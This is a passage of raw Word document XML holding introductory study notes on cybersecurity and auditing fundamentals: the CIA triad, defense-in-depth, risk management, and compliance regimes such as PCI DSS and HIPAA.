          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>shows effective group policy of current user in context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17867DDA" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B71BE7D" w14:textId="312BE953" w:rsidR="00933241" w:rsidRDefault="00933241" w:rsidP="00933241">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>AUDITING FUNDAMENTALS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC359C2" w14:textId="77777777" w:rsidR="00AE1E7B" w:rsidRDefault="00AE1E7B" w:rsidP="00933241">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B788269" w14:textId="57E0D556" w:rsidR="00AE1E7B" w:rsidRDefault="00AE1E7B" w:rsidP="00AE1E7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cybersecu</w:t>
      </w:r>
      <w:r w:rsidR="00D4052B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>rity Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19410514" w14:textId="77777777" w:rsidR="00D4052B" w:rsidRDefault="00D4052B" w:rsidP="00AE1E7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E274E4" w14:textId="21549DB2" w:rsidR="00D4052B" w:rsidRDefault="00D4052B" w:rsidP="00D4052B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The protection of computer systems in networks from information discovery, theft, or exfil</w:t>
      </w:r>
      <w:r w:rsidR="00DD32B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. As well as the destruction of those very machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB1A84" w14:textId="13691536" w:rsidR="00DD32B6" w:rsidRDefault="00DD32B6" w:rsidP="00D4052B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>We are essentially protecting information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D36412" w14:textId="42299935" w:rsidR="00DD32B6" w:rsidRDefault="00DD32B6" w:rsidP="00DD32B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568993F6" w14:textId="0138DBA5" w:rsidR="00DD32B6" w:rsidRDefault="00DD32B6" w:rsidP="00DD32B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Healthcare Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDA13A9" w14:textId="6A8FE27B" w:rsidR="00DD32B6" w:rsidRDefault="00DD32B6" w:rsidP="00DD32B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Financial Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F11BF1" w14:textId="3161BE09" w:rsidR="00DD32B6" w:rsidRDefault="00DD32B6" w:rsidP="00DD32B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Intellectual Property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C14B5BE" w14:textId="71CC6403" w:rsidR="00DD32B6" w:rsidRDefault="00DD32B6" w:rsidP="00DD32B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Business Secrets &amp; Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF2E72" w14:textId="0CCF76A3" w:rsidR="00DD32B6" w:rsidRDefault="00DD32B6" w:rsidP="00DD32B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>We are protecting from:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B493649" w14:textId="7DD299F4" w:rsidR="00DD32B6" w:rsidRDefault="00DD32B6" w:rsidP="00DD32B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Any malicious actors that may want to compromise the data prior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AC978F" w14:textId="542C42D7" w:rsidR="00DD32B6" w:rsidRPr="00446645" w:rsidRDefault="00DD32B6" w:rsidP="00DD32B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Dumbass </w:t>
      </w:r>
      <w:r w:rsidR="00540116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Triangle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BE6788" w14:textId="650B0FA3" w:rsidR="00DD32B6" w:rsidRPr="00DD32B6" w:rsidRDefault="00DD32B6" w:rsidP="00446645">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Confidentiality: Your eyes only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0490DEC2" w14:textId="16D8774C" w:rsidR="00DD32B6" w:rsidRDefault="00DD32B6" w:rsidP="00446645">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrity: </w:t>
      </w:r>
      <w:r w:rsidR="00446645">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Only authorized changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F391AF" w14:textId="45132129" w:rsidR="00446645" w:rsidRDefault="00446645" w:rsidP="00446645">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Availability: Data should be available at any time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED73971" w14:textId="1AF76872" w:rsidR="00446645" w:rsidRDefault="00DE77EE" w:rsidP="00446645">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Defense-in-Depth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5042C3C3" w14:textId="26EDCDD9" w:rsidR="00DE77EE" w:rsidRDefault="00667680" w:rsidP="00DE77EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>What you’re securing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C03DC0" w14:textId="2E69ABBA" w:rsidR="00667680" w:rsidRDefault="00667680" w:rsidP="00DE77EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>How important it is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD1D9E2" w14:textId="0BFEB80E" w:rsidR="00667680" w:rsidRDefault="00667680" w:rsidP="00DE77EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6367510F" w14:textId="7A4B45DF" w:rsidR="00667680" w:rsidRDefault="00667680" w:rsidP="00DE77EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Layers of Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCAF528" w14:textId="5478BBD3" w:rsidR="00A57C21" w:rsidRDefault="00A57C21" w:rsidP="00A57C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Business Needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D24B6" w14:textId="384610FD" w:rsidR="00A57C21" w:rsidRDefault="00A57C21" w:rsidP="00A57C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>What does the business need to protect?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD78D7B" w14:textId="5E8649AC" w:rsidR="00A57C21" w:rsidRDefault="00A57C21" w:rsidP="00A57C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>How can they do this and prevent customer impact?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076C24DC" w14:textId="4640A749" w:rsidR="00A57C21" w:rsidRDefault="00A57C21" w:rsidP="00A57C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Risk Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7813D8BA" w14:textId="792C98E4" w:rsidR="00A57C21" w:rsidRDefault="00A57C21" w:rsidP="00A57C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Need to measure how much can be saved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5DCDC1" w14:textId="4B78ED18" w:rsidR="00A57C21" w:rsidRDefault="00A57C21" w:rsidP="00A57C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>How much property can be saved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A7FE6E" w14:textId="0F33A621" w:rsidR="00A57C21" w:rsidRDefault="00A57C21" w:rsidP="00A57C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Costs?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784D2671" w14:textId="5B65CBBD" w:rsidR="00F01D2D" w:rsidRDefault="00F01D2D" w:rsidP="00F01D2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8B1C5D" w14:textId="35CFB5A6" w:rsidR="0030154A" w:rsidRDefault="00FD76E4" w:rsidP="00FD76E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sometimes companies aren’t allowed to take the necessary measures during a penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E62488C" w14:textId="77777777" w:rsidR="00FD76E4" w:rsidRDefault="00FD76E4" w:rsidP="00FD76E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377B1C0C" w14:textId="4905E45C" w:rsidR="00FD76E4" w:rsidRDefault="00FD76E4" w:rsidP="00FD76E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Regulations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F294567" w14:textId="48F3FFB0" w:rsidR="00FD76E4" w:rsidRDefault="00FD76E4" w:rsidP="00FD76E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PCI DSS</w:t>
      </w:r>
      <w:r w:rsidR="00DD2C90">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Payment Card Industry Data Security Standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75801DEE" w14:textId="764F6F7E" w:rsidR="00DD2C90" w:rsidRDefault="00DD2C90" w:rsidP="00DD2C90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mandated by card brands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EC279C" w14:textId="40AFBECB" w:rsidR="00DD2C90" w:rsidRDefault="00DD2C90" w:rsidP="00DD2C90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Administered by Payment Card Industry Security Standards Council</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309813F6" w14:textId="46965BC1" w:rsidR="00DD2C90" w:rsidRDefault="00DD2C90" w:rsidP="00DD2C90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Created to increase controls around cardholder data to reduce credit card </w:t>
      </w:r>
      <w:r w:rsidR="00F7075F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>fraud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E0EF42" w14:textId="055DEE62" w:rsidR="00FD76E4" w:rsidRDefault="00FD76E4" w:rsidP="00FD76E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>HIPAA</w:t>
      </w:r>
      <w:r w:rsidR="00B43380">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Health Insurance Portability and Accountability Act of 1996</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF29C2A" w14:textId="655EF63E" w:rsidR="00F7075F" w:rsidRDefault="00B43380" w:rsidP="00F7075F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>US regulations for the use and disclosure of Protected Health Information (PHI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F2D838" w14:textId="67CCF235" w:rsidR="00B43380" w:rsidRDefault="00B43380" w:rsidP="00F7075F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Final Rule on Security Standards was issued on February 20,</w:t>
      </w:r>
      <w:r w:rsidR="00851757">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6781A6CA" w14:textId="553E8659" w:rsidR="00851757" w:rsidRDefault="00851757" w:rsidP="00F7075F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Standards and Specifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A56F1A6" w14:textId="55C9182C" w:rsidR="00851757" w:rsidRDefault="00851757" w:rsidP="00851757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Administrative Safeguards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC38823" w14:textId="2F27697A" w:rsidR="00851757" w:rsidRDefault="00851757" w:rsidP="00851757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Physical Safeguards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F8E0AA" w14:textId="28188222" w:rsidR="00851757" w:rsidRDefault="00851757" w:rsidP="00851757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Technical Safeguards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58F290" w14:textId="57CB7DB0" w:rsidR="00FD76E4" w:rsidRDefault="00FD76E4" w:rsidP="00FD76E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
